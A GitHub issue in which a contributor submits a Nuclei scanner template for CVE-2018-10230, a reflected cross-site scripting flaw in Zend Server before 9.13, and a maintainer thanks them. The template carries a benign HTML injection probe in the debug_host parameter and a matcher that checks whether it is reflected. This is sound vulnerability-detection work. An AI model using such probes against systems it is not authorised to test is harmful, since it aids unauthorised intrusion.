CVE-2018-10230
rohsec opened this issue · comments
Rohit commented
Template Information:
Cross Site scripting in sites using ZendServer < 9.13 via the "debug_host" parameter
Nuclei Template:
id: CVE-2018-10230
info:
name: Zend Server <9.13 XSS
author: marcos_iaf
severity: medium
description: A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter.
reference: https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf
tags: xss,zend,php
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?debug_host=\"><u>tester</u>&start_debug=1"
matchers-condition: and
matchers:
- type: word
words:
- "<u>tester</u>"
part: body
- type: status
status:
- 200
Prince Chaddha commented
Hello @720922, thank you so much for sharing this template with the community and contributing to this project 🍻